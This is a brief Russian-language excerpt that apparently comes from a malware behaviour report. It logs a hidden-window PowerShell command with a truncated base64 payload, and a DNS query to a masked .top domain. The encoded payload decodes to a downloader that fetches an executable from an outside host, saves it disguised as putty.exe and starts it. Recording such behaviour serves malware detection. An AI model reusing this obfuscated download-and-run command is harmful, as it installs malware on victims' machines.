Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $code = 'JHBhdGggPSAiLi5ccHV0dHkuZXhlIjsgJHdjID0gbmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyAkd2MuZG93bmxvYWRmaWxlKCJodHRwczovL3RvYmVyc29uLnRvcC9kb3dubG9hZDEvd2luZC5leGUiLCAkcGF0aCk7IHN0YXJ0LXByb2Nlc3Mg...
- DNS ASK to###son.top
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $code = 'JHBhdGggPSAiLi5ccHV0dHkuZXhlIjsgJHdjID0gbmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyAkd2MuZG93bmxvYWRmaWxlKCJodHRwczovL3RvYmVyc29uLnRvcC9kb3dubG9hZDEvd2luZC5leGUiLCAkcGF0aCk7IHN0YXJ0LXByb2Nlc3Mg...' (со скрытым окном)